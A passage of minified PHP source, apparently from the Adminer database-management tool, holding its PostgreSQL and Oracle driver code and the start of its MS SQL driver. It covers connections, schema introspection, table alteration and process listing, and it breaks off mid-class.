query($H,$Sh=false){$I=@pg_query($this->_link,$H);$this->error="";if(!$I){$this->error=pg_last_error($this->_link);return
false;}elseif(!pg_num_fields($I)){$this->affected_rows=pg_affected_rows($I);return
true;}return
new
Min_Result($I);}function
multi_query($H){return$this->_result=$this->query($H);}function
store_result(){return$this->_result;}function
next_result(){return
false;}function
result($H,$o=0){$I=$this->query($H);if(!$I||!$I->num_rows)return
false;return
pg_fetch_result($I->_result,0,$o);}}class
Min_Result{var$_result,$_offset=0,$num_rows;function
__construct($I){$this->_result=$I;$this->num_rows=pg_num_rows($I);}function
fetch_assoc(){return
pg_fetch_assoc($this->_result);}function
fetch_row(){return
pg_fetch_row($this->_result);}function
fetch_field(){$d=$this->_offset++;$J=new
stdClass;if(function_exists('pg_field_table'))$J->orgtable=pg_field_table($this->_result,$d);$J->name=pg_field_name($this->_result,$d);$J->orgname=$J->name;$J->type=pg_field_type($this->_result,$d);$J->charsetnr=($J->type=="bytea"?63:0);return$J;}function
__destruct(){pg_free_result($this->_result);}}}elseif(extension_loaded("pdo_pgsql")){class
Min_DB
extends
Min_PDO{var$extension="PDO_PgSQL";function
connect($N,$V,$G){global$b;$m=$b->database();$Q="pgsql:host='".str_replace(":","' port='",addcslashes($N,"'\\"))."' options='-c client_encoding=utf8'";$this->dsn("$Q dbname='".($m!=""?addcslashes($m,"'\\"):"postgres")."'",$V,$G);return
true;}function
select_db($k){global$b;return($b->database()==$k);}function
close(){}}}class
Min_Driver
extends
Min_SQL{function
insertUpdate($R,$L,$Kf){global$g;foreach($L
as$O){$Zh=array();$Z=array();foreach($O
as$y=>$X){$Zh[]="$y = $X";if(isset($Kf[idf_unescape($y)]))$Z[]="$y = $X";}if(!(($Z&&queries("UPDATE ".table($R)." SET ".implode(", ",$Zh)." WHERE ".implode(" AND ",$Z))&&$g->affected_rows)||queries("INSERT INTO ".table($R)." (".implode(", ",array_keys($O)).") VALUES (".implode(", ",$O).")")))return
false;}return
true;}}function
idf_escape($u){return'"'.str_replace('"','""',$u).'"';}function
table($u){return
idf_escape($u);}function
connect(){global$b,$Rh,$Yg;$g=new
Min_DB;$j=$b->credentials();if($g->connect($j[0],$j[1],$j[2])){if($g->server_info>=9){$g->query("SET application_name = 'Adminer'");if($g->server_info>=9.2){$Yg[lang(23)][]="json";$Rh["json"]=4294967295;if($g->server_info>=9.4){$Yg[lang(23)][]="jsonb";$Rh["jsonb"]=4294967295;}}}return$g;}return$g->error;}function
get_databases(){return
get_vals("SELECT datname FROM pg_database WHERE has_database_privilege(datname, 'CONNECT') ORDER BY datname");}function
limit($H,$Z,$z,$D=0,$Dg=" "){return" $H$Z".($z!==null?$Dg."LIMIT $z".($D?" OFFSET $D":""):"");}function
limit1($H,$Z){return" $H$Z";}function
db_collation($m,$ob){global$g;return$g->result("SHOW LC_COLLATE");}function
engines(){return
array();}function
logged_user(){global$g;return$g->result("SELECT user");}function
tables_list(){$H="SELECT table_name, table_type FROM information_schema.tables WHERE table_schema = current_schema()";if(support('materializedview'))$H.="
UNION ALL
SELECT matviewname, 'MATERIALIZED VIEW'
FROM pg_matviews
WHERE schemaname = current_schema()";$H.="
ORDER BY 1";return
get_key_vals($H);}function
count_tables($l){return
array();}function
table_status($C=""){$J=array();foreach(get_rows("SELECT c.relname AS \"Name\", CASE c.relkind WHEN 'r' THEN 'table' WHEN 'm' THEN 'materialized view' ELSE 'view' END AS \"Engine\", pg_relation_size(c.oid) AS \"Data_length\", pg_total_relation_size(c.oid) - pg_relation_size(c.oid) AS \"Index_length\", obj_description(c.oid, 'pg_class') AS \"Comment\", c.relhasoids::int AS \"Oid\", c.reltuples as \"Rows\", n.nspname
FROM pg_class c
JOIN pg_namespace n ON(n.nspname = current_schema() AND n.oid = c.relnamespace)
WHERE relkind IN ('r', 'm', 'v')
".($C!=""?"AND relname = ".q($C):"ORDER BY c.oid"))as$K)$J[$K["Name"]]=$K;return($C!=""?$J[$C]:$J);}function
is_view($S){return
in_array($S["Engine"],array("view","materialized view"));}function
fk_support($S){return
true;}function
fields($R){$J=array();$Ca=array('timestamp without time zone'=>'timestamp','timestamp with time zone'=>'timestamptz',);foreach(get_rows("SELECT a.attname AS field, format_type(a.atttypid, a.atttypmod) AS full_type, d.adsrc AS default, a.attnotnull::int, col_description(c.oid, a.attnum) AS comment
FROM pg_class c
JOIN pg_namespace n ON c.relnamespace = n.oid
JOIN pg_attribute a ON c.oid = a.attrelid
LEFT JOIN pg_attrdef d ON c.oid = d.adrelid AND a.attnum = d.adnum
WHERE c.relname = ".q($R)."
AND n.nspname = current_schema()
AND NOT a.attisdropped
AND a.attnum > 0
ORDER BY a.attnum")as$K){preg_match('~([^([]+)(\((.*)\))?([a-z ]+)?((\[[0-9]*])*)$~',$K["full_type"],$B);list(,$U,$be,$K["length"],$wa,$Fa)=$B;$K["length"].=$Fa;$cb=$U.$wa;if(isset($Ca[$cb])){$K["type"]=$Ca[$cb];$K["full_type"]=$K["type"].$be.$Fa;}else{$K["type"]=$U;$K["full_type"]=$K["type"].$be.$wa.$Fa;}$K["null"]=!$K["attnotnull"];$K["auto_increment"]=preg_match('~^nextval\\(~i',$K["default"]);$K["privileges"]=array("insert"=>1,"select"=>1,"update"=>1);if(preg_match('~(.+)::[^)]+(.*)~',$K["default"],$B))$K["default"]=($B[1][0]=="'"?idf_unescape($B[1]):$B[1]).$B[2];$J[$K["field"]]=$K;}return$J;}function
indexes($R,$h=null){global$g;if(!is_object($h))$h=$g;$J=array();$hh=$h->result("SELECT oid FROM pg_class WHERE relnamespace = (SELECT oid FROM pg_namespace WHERE nspname = current_schema()) AND relname = ".q($R));$e=get_key_vals("SELECT attnum, attname FROM pg_attribute WHERE attrelid = $hh AND attnum > 0",$h);foreach(get_rows("SELECT relname, indisunique::int, indisprimary::int, indkey, indoption , (indpred IS NOT NULL)::int as indispartial FROM pg_index i, pg_class ci WHERE i.indrelid = $hh AND ci.oid = i.indexrelid",$h)as$K){$hg=$K["relname"];$J[$hg]["type"]=($K["indispartial"]?"INDEX":($K["indisprimary"]?"PRIMARY":($K["indisunique"]?"UNIQUE":"INDEX")));$J[$hg]["columns"]=array();foreach(explode(" ",$K["indkey"])as$ud)$J[$hg]["columns"][]=$e[$ud];$J[$hg]["descs"]=array();foreach(explode(" ",$K["indoption"])as$vd)$J[$hg]["descs"][]=($vd&1?'1':null);$J[$hg]["lengths"]=array();}return$J;}function
foreign_keys($R){global$Te;$J=array();foreach(get_rows("SELECT conname, condeferrable::int AS deferrable, pg_get_constraintdef(oid) AS definition
FROM pg_constraint
WHERE conrelid = (SELECT pc.oid FROM pg_class AS pc INNER JOIN pg_namespace AS pn ON (pn.oid = pc.relnamespace) WHERE pc.relname = ".q($R)." AND pn.nspname = current_schema())
AND contype = 'f'::char
ORDER BY conkey, conname")as$K){if(preg_match('~FOREIGN KEY\s*\((.+)\)\s*REFERENCES (.+)\((.+)\)(.*)$~iA',$K['definition'],$B)){$K['source']=array_map('trim',explode(',',$B[1]));if(preg_match('~^(("([^"]|"")+"|[^"]+)\.)?"?("([^"]|"")+"|[^"]+)$~',$B[2],$je)){$K['ns']=str_replace('""','"',preg_replace('~^"(.+)"$~','\1',$je[2]));$K['table']=str_replace('""','"',preg_replace('~^"(.+)"$~','\1',$je[4]));}$K['target']=array_map('trim',explode(',',$B[3]));$K['on_delete']=(preg_match("~ON DELETE ($Te)~",$B[4],$je)?$je[1]:'NO ACTION');$K['on_update']=(preg_match("~ON UPDATE ($Te)~",$B[4],$je)?$je[1]:'NO ACTION');$J[$K['conname']]=$K;}}return$J;}function
view($C){global$g;return
array("select"=>trim($g->result("SELECT pg_get_viewdef(".q($C).")")));}function
collations(){return
array();}function
information_schema($m){return($m=="information_schema");}function
error(){global$g;$J=h($g->error);if(preg_match('~^(.*\\n)?([^\\n]*)\\n( *)\\^(\\n.*)?$~s',$J,$B))$J=$B[1].preg_replace('~((?:[^&]|&[^;]*;){'.strlen($B[3]).'})(.*)~','\\1<b>\\2</b>',$B[2]).$B[4];return
nl_br($J);}function
create_database($m,$nb){return
queries("CREATE DATABASE ".idf_escape($m).($nb?" ENCODING ".idf_escape($nb):""));}function
drop_databases($l){global$g;$g->close();return
apply_queries("DROP DATABASE",$l,'idf_escape');}function
rename_database($C,$nb){return
queries("ALTER DATABASE ".idf_escape(DB)." RENAME TO ".idf_escape($C));}function
auto_increment(){return"";}function
alter_table($R,$C,$p,$Rc,$sb,$oc,$nb,$La,$wf){$c=array();$Uf=array();foreach($p
as$o){$d=idf_escape($o[0]);$X=$o[1];if(!$X)$c[]="DROP $d";else{$ii=$X[5];unset($X[5]);if(isset($X[6])&&$o[0]=="")$X[1]=($X[1]=="bigint"?" big":" ")."serial";if($o[0]=="")$c[]=($R!=""?"ADD ":" ").implode($X);else{if($d!=$X[0])$Uf[]="ALTER TABLE ".table($R)." RENAME $d TO $X[0]";$c[]="ALTER $d TYPE$X[1]";if(!$X[6]){$c[]="ALTER $d ".($X[3]?"SET$X[3]":"DROP DEFAULT");$c[]="ALTER $d ".($X[2]==" NULL"?"DROP NOT":"SET").$X[2];}}if($o[0]!=""||$ii!="")$Uf[]="COMMENT ON COLUMN ".table($R).".$X[0] IS ".($ii!=""?substr($ii,9):"''");}}$c=array_merge($c,$Rc);if($R=="")array_unshift($Uf,"CREATE TABLE ".table($C)." (\n".implode(",\n",$c)."\n)");elseif($c)array_unshift($Uf,"ALTER TABLE ".table($R)."\n".implode(",\n",$c));if($R!=""&&$R!=$C)$Uf[]="ALTER TABLE ".table($R)." RENAME TO ".table($C);if($R!=""||$sb!="")$Uf[]="COMMENT ON TABLE ".table($C)." IS ".q($sb);if($La!=""){}foreach($Uf
as$H){if(!queries($H))return
false;}return
true;}function
alter_indexes($R,$c){$i=array();$Zb=array();$Uf=array();foreach($c
as$X){if($X[0]!="INDEX")$i[]=($X[2]=="DROP"?"\nDROP CONSTRAINT ".idf_escape($X[1]):"\nADD".($X[1]!=""?" CONSTRAINT ".idf_escape($X[1]):"")." $X[0] ".($X[0]=="PRIMARY"?"KEY ":"")."(".implode(", ",$X[2]).")");elseif($X[2]=="DROP")$Zb[]=idf_escape($X[1]);else$Uf[]="CREATE INDEX ".idf_escape($X[1]!=""?$X[1]:uniqid($R."_"))." ON ".table($R)." (".implode(", ",$X[2]).")";}if($i)array_unshift($Uf,"ALTER TABLE ".table($R).implode(",",$i));if($Zb)array_unshift($Uf,"DROP INDEX ".implode(", ",$Zb));foreach($Uf
as$H){if(!queries($H))return
false;}return
true;}function
truncate_tables($T){return
queries("TRUNCATE ".implode(", ",array_map('table',$T)));return
true;}function
drop_views($oi){return
drop_tables($oi);}function
drop_tables($T){foreach($T
as$R){$P=table_status($R);if(!queries("DROP ".strtoupper($P["Engine"])." ".table($R)))return
false;}return
true;}function
move_tables($T,$oi,$oh){foreach(array_merge($T,$oi)as$R){$P=table_status($R);if(!queries("ALTER ".strtoupper($P["Engine"])." ".table($R)." SET SCHEMA ".idf_escape($oh)))return
false;}return
true;}function
trigger($C,$R=null){if($C=="")return
array("Statement"=>"EXECUTE PROCEDURE ()");if($R===null)$R=$_GET['trigger'];$L=get_rows('SELECT t.trigger_name AS "Trigger", t.action_timing AS "Timing", (SELECT STRING_AGG(event_manipulation, \' OR \') FROM information_schema.triggers WHERE event_object_table = t.event_object_table AND trigger_name = t.trigger_name ) AS "Events", t.event_manipulation AS "Event", \'FOR EACH \' || t.action_orientation AS "Type", t.action_statement AS "Statement" FROM information_schema.triggers t WHERE t.event_object_table = '.q($R).' AND t.trigger_name = '.q($C));return
reset($L);}function
triggers($R){$J=array();foreach(get_rows("SELECT * FROM information_schema.triggers WHERE event_object_table = ".q($R))as$K)$J[$K["trigger_name"]]=array($K["action_timing"],$K["event_manipulation"]);return$J;}function
trigger_options(){return
array("Timing"=>array("BEFORE","AFTER"),"Event"=>array("INSERT","UPDATE","DELETE"),"Type"=>array("FOR EACH ROW","FOR EACH STATEMENT"),);}function
routines(){return
get_rows('SELECT p.proname AS "ROUTINE_NAME", p.proargtypes AS "ROUTINE_TYPE", pg_catalog.format_type(p.prorettype, NULL) AS "DTD_IDENTIFIER"
FROM pg_catalog.pg_namespace n
JOIN pg_catalog.pg_proc p ON p.pronamespace = n.oid
WHERE n.nspname = current_schema()
ORDER BY p.proname');}function
routine_languages(){return
get_vals("SELECT langname FROM pg_catalog.pg_language");}function
last_id(){return
0;}function
explain($g,$H){return$g->query("EXPLAIN $H");}function
found_rows($S,$Z){global$g;if(preg_match("~ rows=([0-9]+)~",$g->result("EXPLAIN SELECT * FROM ".idf_escape($S["Name"]).($Z?" WHERE ".implode(" AND ",$Z):"")),$gg))return$gg[1];return
false;}function
types(){return
get_vals("SELECT typname
FROM pg_type
WHERE typnamespace = (SELECT oid FROM pg_namespace WHERE nspname = current_schema())
AND typtype IN ('b','d','e')
AND typelem = 0");}function
schemas(){return
get_vals("SELECT nspname FROM pg_namespace ORDER BY nspname");}function
get_schema(){global$g;return$g->result("SELECT current_schema()");}function
set_schema($xg){global$g,$Rh,$Yg;$J=$g->query("SET search_path TO ".idf_escape($xg));foreach(types()as$U){if(!isset($Rh[$U])){$Rh[$U]=0;$Yg[lang(24)][]=$U;}}return$J;}function
create_sql($R,$La){global$g;$J='';$ng=array();$Fg=array();$P=table_status($R);$p=fields($R);$w=indexes($R);ksort($w);$Pc=foreign_keys($R);ksort($Pc);$Oh=triggers($R);if(!$P||empty($p))return
false;$J="CREATE TABLE ".idf_escape($P['nspname']).".".idf_escape($P['Name'])." (\n ";foreach($p
as$Ic=>$o){$tf=idf_escape($o['field']).' '.$o['full_type'].(is_null($o['default'])?"":" DEFAULT $o[default]").($o['attnotnull']?" NOT NULL":"");$ng[]=$tf;if(preg_match('~nextval\(\'([^\']+)\'\)~',$o['default'],$ke)){$Eg=$ke[1];$Sg=reset(get_rows("SELECT * FROM $Eg"));$Fg[]="CREATE SEQUENCE $Eg INCREMENT $Sg[increment_by] MINVALUE $Sg[min_value] MAXVALUE $Sg[max_value] START ".($La?$Sg['last_value']:1)." CACHE $Sg[cache_value];";}}if(!empty($Fg))$J=implode("\n\n",$Fg)."\n\n$J";foreach($w
as$sd=>$v){switch($v['type']){case'UNIQUE':$ng[]="CONSTRAINT ".idf_escape($sd)." UNIQUE (".implode(', ',array_map('idf_escape',$v['columns'])).")";break;case'PRIMARY':$ng[]="CONSTRAINT ".idf_escape($sd)." PRIMARY KEY (".implode(', ',array_map('idf_escape',$v['columns'])).")";break;}}foreach($Pc
as$Oc=>$Nc)$ng[]="CONSTRAINT ".idf_escape($Oc)." $Nc[definition] ".($Nc['deferrable']?'DEFERRABLE':'NOT DEFERRABLE');$J.=implode(",\n ",$ng)."\n) WITH (oids = ".($P['Oid']?'true':'false').");";foreach($w
as$sd=>$v){if($v['type']=='INDEX')$J.="\n\nCREATE INDEX ".idf_escape($sd)." ON ".idf_escape($P['nspname']).".".idf_escape($P['Name'])." USING btree (".implode(', ',array_map('idf_escape',$v['columns'])).");";}if($P['Comment'])$J.="\n\nCOMMENT ON TABLE ".idf_escape($P['nspname']).".".idf_escape($P['Name'])." IS ".q($P['Comment']).";";foreach($p
as$Ic=>$o){if($o['comment'])$J.="\n\nCOMMENT ON COLUMN ".idf_escape($P['nspname']).".".idf_escape($P['Name']).".".idf_escape($Ic)." IS ".q($o['comment']).";";}foreach($Oh
as$Kh=>$Jh){$Lh=trigger($Kh,$P['Name']);$J.="\n\nCREATE TRIGGER ".idf_escape($Lh['Trigger'])." $Lh[Timing] $Lh[Events] ON ".idf_escape($P["nspname"]).".".idf_escape($P['Name'])." $Lh[Type] $Lh[Statement];";}return
rtrim($J,';');}function
trigger_sql($R,$Zg){$J="";return
false;}function
use_sql($k){return"\connect ".idf_escape($k);}function
show_variables(){return
get_key_vals("SHOW ALL");}function
process_list(){global$g;return
get_rows("SELECT * FROM pg_stat_activity ORDER BY ".($g->server_info<9.2?"procpid":"pid"));}function
show_status(){}function
convert_field($o){}function
unconvert_field($o,$J){return$J;}function
support($Gc){global$g;return
preg_match('~^(database|table|columns|sql|indexes|comment|view|'.($g->server_info>=9.3?'materializedview|':'').'scheme|processlist|sequence|trigger|type|variables|drop_col|kill|dump)$~',$Gc);}function
kill_process($X){return
queries("SELECT pg_terminate_backend(".number($X).")");}function
connection_id(){return"SELECT pg_backend_pid()";}function
max_connections(){global$g;return$g->result("SHOW max_connections");}$x="pgsql";$Rh=array();$Yg=array();foreach(array(lang(25)=>array("smallint"=>5,"integer"=>10,"bigint"=>19,"boolean"=>1,"numeric"=>0,"real"=>7,"double precision"=>16,"money"=>20),lang(26)=>array("date"=>13,"time"=>17,"timestamp"=>20,"timestamptz"=>21,"interval"=>0),lang(23)=>array("character"=>0,"character varying"=>0,"text"=>0,"tsquery"=>0,"tsvector"=>0,"uuid"=>0,"xml"=>0),lang(27)=>array("bit"=>0,"bit varying"=>0,"bytea"=>0),lang(28)=>array("cidr"=>43,"inet"=>43,"macaddr"=>17,"txid_snapshot"=>0),lang(29)=>array("box"=>0,"circle"=>0,"line"=>0,"lseg"=>0,"path"=>0,"point"=>0,"polygon"=>0),)as$y=>$X){$Rh+=$X;$Yg[$y]=array_keys($X);}$Yh=array();$Ye=array("=","<",">","<=",">=","!=","~","!~","LIKE","LIKE %%","ILIKE","ILIKE %%","IN","IS NULL","NOT LIKE","NOT IN","IS NOT NULL");$Zc=array("char_length","lower","round","to_hex","to_timestamp","upper");$ed=array("avg","count","count distinct","max","min","sum");$gc=array(array("char"=>"md5","date|time"=>"now",),array("int|numeric|real|money"=>"+/-","date|time"=>"+ interval/- interval","char|text"=>"||",));}$Yb["oracle"]="Oracle";if(isset($_GET["oracle"])){$Hf=array("OCI8","PDO_OCI");define("DRIVER","oracle");if(extension_loaded("oci8")){class
Min_DB{var$extension="oci8",$_link,$_result,$server_info,$affected_rows,$errno,$error;function
_error($rc,$n){if(ini_bool("html_errors"))$n=html_entity_decode(strip_tags($n));$n=preg_replace('~^[^:]*: ~','',$n);$this->error=$n;}function
connect($N,$V,$G){$this->_link=@oci_new_connect($V,$G,$N,"AL32UTF8");if($this->_link){$this->server_info=oci_server_version($this->_link);return
true;}$n=oci_error();$this->error=$n["message"];return
false;}function
quote($Q){return"'".str_replace("'","''",$Q)."'";}function
select_db($k){return
true;}function
query($H,$Sh=false){$I=oci_parse($this->_link,$H);$this->error="";if(!$I){$n=oci_error($this->_link);$this->errno=$n["code"];$this->error=$n["message"];return
false;}set_error_handler(array($this,'_error'));$J=@oci_execute($I);restore_error_handler();if($J){if(oci_num_fields($I))return
new
Min_Result($I);$this->affected_rows=oci_num_rows($I);}return$J;}function
multi_query($H){return$this->_result=$this->query($H);}function
store_result(){return$this->_result;}function
next_result(){return
false;}function
result($H,$o=1){$I=$this->query($H);if(!is_object($I)||!oci_fetch($I->_result))return
false;return
oci_result($I->_result,$o);}}class
Min_Result{var$_result,$_offset=1,$num_rows;function
__construct($I){$this->_result=$I;}function
_convert($K){foreach((array)$K
as$y=>$X){if(is_a($X,'OCI-Lob'))$K[$y]=$X->load();}return$K;}function
fetch_assoc(){return$this->_convert(oci_fetch_assoc($this->_result));}function
fetch_row(){return$this->_convert(oci_fetch_row($this->_result));}function
fetch_field(){$d=$this->_offset++;$J=new
stdClass;$J->name=oci_field_name($this->_result,$d);$J->orgname=$J->name;$J->type=oci_field_type($this->_result,$d);$J->charsetnr=(preg_match("~raw|blob|bfile~",$J->type)?63:0);return$J;}function
__destruct(){oci_free_statement($this->_result);}}}elseif(extension_loaded("pdo_oci")){class
Min_DB
extends
Min_PDO{var$extension="PDO_OCI";function
connect($N,$V,$G){$this->dsn("oci:dbname=//$N;charset=AL32UTF8",$V,$G);return
true;}function
select_db($k){return
true;}}}class
Min_Driver
extends
Min_SQL{function
begin(){return
true;}}function
idf_escape($u){return'"'.str_replace('"','""',$u).'"';}function
table($u){return
idf_escape($u);}function
connect(){global$b;$g=new
Min_DB;$j=$b->credentials();if($g->connect($j[0],$j[1],$j[2]))return$g;return$g->error;}function
get_databases(){return
get_vals("SELECT tablespace_name FROM user_tablespaces");}function
limit($H,$Z,$z,$D=0,$Dg=" "){return($D?" * FROM (SELECT t.*, rownum AS rnum FROM (SELECT $H$Z) t WHERE rownum <= ".($z+$D).") WHERE rnum > $D":($z!==null?" * FROM (SELECT $H$Z) WHERE rownum <= ".($z+$D):" $H$Z"));}function
limit1($H,$Z){return" $H$Z";}function
db_collation($m,$ob){global$g;return$g->result("SELECT value FROM nls_database_parameters WHERE parameter = 'NLS_CHARACTERSET'");}function
engines(){return
array();}function
logged_user(){global$g;return$g->result("SELECT USER FROM DUAL");}function
tables_list(){return
get_key_vals("SELECT table_name, 'table' FROM all_tables WHERE tablespace_name = ".q(DB)."
UNION SELECT view_name, 'view' FROM user_views
ORDER BY 1");}function
count_tables($l){return
array();}function
table_status($C=""){$J=array();$zg=q($C);foreach(get_rows('SELECT table_name "Name", \'table\' "Engine", avg_row_len * num_rows "Data_length", num_rows "Rows" FROM all_tables WHERE tablespace_name = '.q(DB).($C!=""?" AND table_name = $zg":"")."
UNION SELECT view_name, 'view', 0, 0 FROM user_views".($C!=""?" WHERE view_name = $zg":"")."
ORDER BY 1")as$K){if($C!="")return$K;$J[$K["Name"]]=$K;}return$J;}function
is_view($S){return$S["Engine"]=="view";}function
fk_support($S){return
true;}function
fields($R){$J=array();foreach(get_rows("SELECT * FROM all_tab_columns WHERE table_name = ".q($R)." ORDER BY column_id")as$K){$U=$K["DATA_TYPE"];$be="$K[DATA_PRECISION],$K[DATA_SCALE]";if($be==",")$be=$K["DATA_LENGTH"];$J[$K["COLUMN_NAME"]]=array("field"=>$K["COLUMN_NAME"],"full_type"=>$U.($be?"($be)":""),"type"=>strtolower($U),"length"=>$be,"default"=>$K["DATA_DEFAULT"],"null"=>($K["NULLABLE"]=="Y"),"privileges"=>array("insert"=>1,"select"=>1,"update"=>1),);}return$J;}function
indexes($R,$h=null){$J=array();foreach(get_rows("SELECT uic.*, uc.constraint_type
FROM user_ind_columns uic
LEFT JOIN user_constraints uc ON uic.index_name = uc.constraint_name AND uic.table_name = uc.table_name
WHERE uic.table_name = ".q($R)."
ORDER BY uc.constraint_type, uic.column_position",$h)as$K){$sd=$K["INDEX_NAME"];$J[$sd]["type"]=($K["CONSTRAINT_TYPE"]=="P"?"PRIMARY":($K["CONSTRAINT_TYPE"]=="U"?"UNIQUE":"INDEX"));$J[$sd]["columns"][]=$K["COLUMN_NAME"];$J[$sd]["lengths"][]=($K["CHAR_LENGTH"]&&$K["CHAR_LENGTH"]!=$K["COLUMN_LENGTH"]?$K["CHAR_LENGTH"]:null);$J[$sd]["descs"][]=($K["DESCEND"]?'1':null);}return$J;}function
view($C){$L=get_rows('SELECT text "select" FROM user_views WHERE view_name = '.q($C));return
reset($L);}function
collations(){return
array();}function
information_schema($m){return
false;}function
error(){global$g;return
h($g->error);}function
explain($g,$H){$g->query("EXPLAIN PLAN FOR $H");return$g->query("SELECT * FROM plan_table");}function
found_rows($S,$Z){}function
alter_table($R,$C,$p,$Rc,$sb,$oc,$nb,$La,$wf){$c=$Zb=array();foreach($p
as$o){$X=$o[1];if($X&&$o[0]!=""&&idf_escape($o[0])!=$X[0])queries("ALTER TABLE ".table($R)." RENAME COLUMN ".idf_escape($o[0])." TO $X[0]");if($X)$c[]=($R!=""?($o[0]!=""?"MODIFY (":"ADD ("):" ").implode($X).($R!=""?")":"");else$Zb[]=idf_escape($o[0]);}if($R=="")return
queries("CREATE TABLE ".table($C)." (\n".implode(",\n",$c)."\n)");return(!$c||queries("ALTER TABLE ".table($R)."\n".implode("\n",$c)))&&(!$Zb||queries("ALTER TABLE ".table($R)." DROP (".implode(", ",$Zb).")"))&&($R==$C||queries("ALTER TABLE ".table($R)." RENAME TO ".table($C)));}function
foreign_keys($R){$J=array();$H="SELECT c_list.CONSTRAINT_NAME as NAME,
c_src.COLUMN_NAME as SRC_COLUMN,
c_dest.OWNER as DEST_DB,
c_dest.TABLE_NAME as DEST_TABLE,
c_dest.COLUMN_NAME as DEST_COLUMN,
c_list.DELETE_RULE as ON_DELETE
FROM ALL_CONSTRAINTS c_list, ALL_CONS_COLUMNS c_src, ALL_CONS_COLUMNS c_dest
WHERE c_list.CONSTRAINT_NAME = c_src.CONSTRAINT_NAME
AND c_list.R_CONSTRAINT_NAME = c_dest.CONSTRAINT_NAME
AND c_list.CONSTRAINT_TYPE = 'R'
AND c_src.TABLE_NAME = ".q($R);foreach(get_rows($H)as$K)$J[$K['NAME']]=array("db"=>$K['DEST_DB'],"table"=>$K['DEST_TABLE'],"source"=>array($K['SRC_COLUMN']),"target"=>array($K['DEST_COLUMN']),"on_delete"=>$K['ON_DELETE'],"on_update"=>null,);return$J;}function
truncate_tables($T){return
apply_queries("TRUNCATE TABLE",$T);}function
drop_views($oi){return
apply_queries("DROP VIEW",$oi);}function
drop_tables($T){return
apply_queries("DROP TABLE",$T);}function
last_id(){return
0;}function
schemas(){return
get_vals("SELECT DISTINCT owner FROM dba_segments WHERE owner IN (SELECT username FROM dba_users WHERE default_tablespace NOT IN ('SYSTEM','SYSAUX'))");}function
get_schema(){global$g;return$g->result("SELECT sys_context('USERENV', 'SESSION_USER') FROM dual");}function
set_schema($yg){global$g;return$g->query("ALTER SESSION SET CURRENT_SCHEMA = ".idf_escape($yg));}function
show_variables(){return
get_key_vals('SELECT name, display_value FROM v$parameter');}function
process_list(){return
get_rows('SELECT sess.process AS "process", sess.username AS "user", sess.schemaname AS "schema", sess.status AS "status", sess.wait_class AS "wait_class", sess.seconds_in_wait AS "seconds_in_wait", sql.sql_text AS "sql_text", sess.machine AS "machine", sess.port AS "port"
FROM v$session sess LEFT OUTER JOIN v$sql sql
ON sql.sql_id = sess.sql_id
WHERE sess.type = \'USER\'
ORDER BY PROCESS
');}function
show_status(){$L=get_rows('SELECT * FROM v$instance');return
reset($L);}function
convert_field($o){}function
unconvert_field($o,$J){return$J;}function
support($Gc){return
preg_match('~^(columns|database|drop_col|indexes|processlist|scheme|sql|status|table|variables|view|view_trigger)$~',$Gc);}$x="oracle";$Rh=array();$Yg=array();foreach(array(lang(25)=>array("number"=>38,"binary_float"=>12,"binary_double"=>21),lang(26)=>array("date"=>10,"timestamp"=>29,"interval year"=>12,"interval day"=>28),lang(23)=>array("char"=>2000,"varchar2"=>4000,"nchar"=>2000,"nvarchar2"=>4000,"clob"=>4294967295,"nclob"=>4294967295),lang(27)=>array("raw"=>2000,"long raw"=>2147483648,"blob"=>4294967295,"bfile"=>4294967296),)as$y=>$X){$Rh+=$X;$Yg[$y]=array_keys($X);}$Yh=array();$Ye=array("=","<",">","<=",">=","!=","LIKE","LIKE %%","IN","IS NULL","NOT LIKE","NOT REGEXP","NOT IN","IS NOT NULL","SQL");$Zc=array("length","lower","round","upper");$ed=array("avg","count","count distinct","max","min","sum");$gc=array(array("date"=>"current_date","timestamp"=>"current_timestamp",),array("number|float|double"=>"+/-","date|timestamp"=>"+ interval/- interval","char|clob"=>"||",));}$Yb["mssql"]="MS SQL";if(isset($_GET["mssql"])){$Hf=array("SQLSRV","MSSQL","PDO_DBLIB");define("DRIVER","mssql");if(extension_loaded("sqlsrv")){class
Min_DB{var$extension="sqlsrv",$_link,$_result,$server_info,$affected_rows,$errno,$error;function
_get_error(){$this->error="";foreach(sqlsrv_errors()as$n){$this->errno=$n["code"];$this->error.="$n[message]\n";}$this->error=rtrim($this->error);}function
connect($N,$V,$G){$this->_link=@sqlsrv_connect($N,array("UID"=>$V,"PWD"=>$G,"CharacterSet"=>"UTF-8"));if($this->_link){$wd=sqlsrv_server_info($this->_link);$this->server_info=$wd['SQLServerVersion'];}else$this->_get_error();return(bool)$this->_link;}function
quote($Q){return"'".str_replace("'","''",$Q)."'";}function
select_db($k){return$this->query("USE ".idf_escape($k));}function
query($H,$Sh=false){$I=sqlsrv_query($this->_link,$H);$this->error="";if(!$I){$this->_get_error();return
false;}return$this->store_result($I);}function
multi_query($H){$this->_result=sqlsrv_query($this->_link,$H);$this->error="";if(!$this->_result){$this->_get_error();return
false;}return
true;}function
store_result($I=null){if(!$I)$I=$this->_result;if(!$I)return
false;if(sqlsrv_field_metadata($I))return
new
Min_Result($I);$this->affected_rows=sqlsrv_rows_affected($I);return
true;}function
next_result(){return$this->_result?sqlsrv_next_result($this->_result):null;}function
result($H,$o=0){$I=$this->query($H);if(!is_object($I))return
false;$K=$I->fetch_row();return$K[$o];}}class
Min_Result{var$_result,$_offset=0,$_fields,$num_rows;function
__construct($I){$this->_result=$I;}function
_convert($K){foreach((array)$K
as$y=>$X){if(is_a($X,'DateTime'))$K[$y]=$X->format("Y-m-d H:i:s");}return$K;}function
fetch_assoc(){return$this->_convert(sqlsrv_fetch_array($this->_result,SQLSRV_FETCH_ASSOC));}function
fetch_row(){return$this->_convert(sqlsrv_fetch_array($this->_result,SQLSRV_FETCH_NUMERIC));}function
fetch_field(){if(!$this->_fields)$this->_fields=sqlsrv_field_metadata($this->_result);$o=$this->_fields[$this->_offset++];$J=new
stdClass;$J->name=$o["Name"];$J->orgname=$o["Name"];$J->type=($o["Type"]==1?254:0);return$J;}function
seek($D){for($s=0;$s<$D;$s++)sqlsrv_fetch($this->_result);}function
__destruct(){sqlsrv_free_stmt($this->_result);}}}elseif(extension_loaded("mssql")){class
Min_DB{var$extension="MSSQL",$_link,$_result,$server_info,$affected_rows,$error;function
